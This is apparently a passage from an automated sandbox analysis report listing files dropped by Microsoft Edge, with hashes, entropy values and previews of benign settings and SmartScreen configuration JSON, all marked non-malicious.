                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.922828737239167
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                                                                                                                  MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                                                                                                                  SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                                                                                                                                  SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                                                                                                                  SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:customSynchronousLookupUris_0
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3581
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.459693941095613
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                                                                                                                  MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                                                                                                                  SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                                                                                                                  SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                                                                                                                  SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.3787834934861767
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:ZK7q6:ZA
                                                                                                                                                                                                                                                                                  MD5:DF741B3F19D9DC2621EAF973C8C9FA9D
                                                                                                                                                                                                                                                                                  SHA1:F45F1D9791C05366A8A23322D497C89957E75E61
                                                                                                                                                                                                                                                                                  SHA-256:6E5DDBA6D7AA3B287EA364034E1F843E4146FF92C07D8426F4A7C4B0E6435006
                                                                                                                                                                                                                                                                                  SHA-512:650DE3F99038BFFBFEF41A9ACC0A06E15803550C6456D0BDEAC9EBE18AEA94AB3A0BB7D85B7A0230CE6F510F5E26FA739FE58924F355D7E3714EC37DAA4C70D2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:downloadCache_
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.991139310853571
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfaOJozRLuLgfGBkGAeekVy8Hfjg9PIAclWASWXV:YWLSGT5Jo9LuLgfGBPAzkVj/EMlW5WF
                                                                                                                                                                                                                                                                                  MD5:034651DEC5878041B50B6F2EB1E060B3
                                                                                                                                                                                                                                                                                  SHA1:453E7A9601F134530CE0CE289C3F5F4143B0308D
                                                                                                                                                                                                                                                                                  SHA-256:1DC9BD86635D705EB363EAE41A7E3CFB09283C3CBE016BC3E0F044A0E083903C
                                                                                                                                                                                                                                                                                  SHA-512:A57D0707DFEC101070AC12B5F3C19EDE6243805473E4CEDEEDB1D89E4B5220BC6F1A1008EA4D1820B327FA51DA482BF45D215258C65C34A255BDF40BF802E689
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"43cfda3051b96ca9","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":0,"expiration_time":1733953303369247}]}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:uriCache_
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.026461567818005
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"43cfda3051b96ca9","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1733953299785837}]}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.389669793590032
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):9453
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.592656881503978
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):22947
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.045027927323956
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.793409403210092
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):9425
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.579639064610539
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):8094
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.801504342613856
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):22947
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.045026201773201
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:atMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhQF0ZT1ttYoA7ieJNH1NinfE:eMkbJrT8IeQc5d1nZT1tKoAOY1NiM
                                                                                                                                                                                                                                                                                  MD5:8FCAA4DAC4D45E78F8510146D5F22883
                                                                                                                                                                                                                                                                                  SHA1:7E4D3C4601836E47892668273F8E78C93BCF3EA6
                                                                                                                                                                                                                                                                                  SHA-256:C1ABC063F85B3246437AD033A3BEDF5DDD5DF7DF2B4E0A2B549A51791DBF12B2
                                                                                                                                                                                                                                                                                  SHA-512:097851ADBD3B65793899B4B5EA3C8716EFD0AFC1195567D7FEEFA5C9FAF78B67BD1B902D50EFF1B0539641C2ECE5DB6BD07CF38FE8B8451A70A6917578A9154B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8338
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.480488250017547
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2VvlIkNZjVe4WJk1cZwbzf8:u+sNwh7sWViRUdA2XjIk1OG+
                                                                                                                                                                                                                                                                                  MD5:FCC7F11B571EB602548FBA749A5692E9
                                                                                                                                                                                                                                                                                  SHA1:789692B4B561F5AD0614D63187E22C8CE26EFB1F
                                                                                                                                                                                                                                                                                  SHA-256:168CE07FAD9665827124E9364A500AF3F25E937379B04FE605A0A6E9771D83AF
                                                                                                                                                                                                                                                                                  SHA-512:E8E9E07CC3BE9ED18B81CBE5F1BB04736AC37FCC4E51E89CF4D2546EB9BE8405381B924BE64F6E08A067C7C320993EA5022BB97DDF072DF4A28D5CA45A5E2D4A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378326089487259","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852494"},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfro
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9453
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.592656881503978
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkE1Je4WJk1cEX:u+sNwh7sWViRUdAIxBhaE1Mk1ZVG+
                                                                                                                                                                                                                                                                                  MD5:9689BB39B34C4262FFE6A272E8C580B6
                                                                                                                                                                                                                                                                                  SHA1:1E2144980A33D7308667B1C8E14B3F58FC6DF839
                                                                                                                                                                                                                                                                                  SHA-256:91CFCB242BB4379FD61F6174BDE0B58AC95E1CA8A93E01D5D836412D929C774C
                                                                                                                                                                                                                                                                                  SHA-512:7641FE6720F45B110516630BC524C8B53557A7304EBA1FACFFCE0C25BE8352DAE61169A967B39C11513D195B2675BED30C3F8D05A463DB8890BDEECC4D48A359
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):9437
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.589197043255668
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:uugqsNk5hdRfbpq3N16Qih/cIyURLl8Rotoe+2vBA2Vvljxf5hZkNUje4WJk1chJ:u+sNwh7sWViRUdAIxBhaNUOk1iVG+
                                                                                                                                                                                                                                                                                  MD5:951210B24955FAF6711225B56ED89D1D
                                                                                                                                                                                                                                                                                  SHA1:A06D26AE9B4A6BD71B9DC32AD5D7EE870403AF32
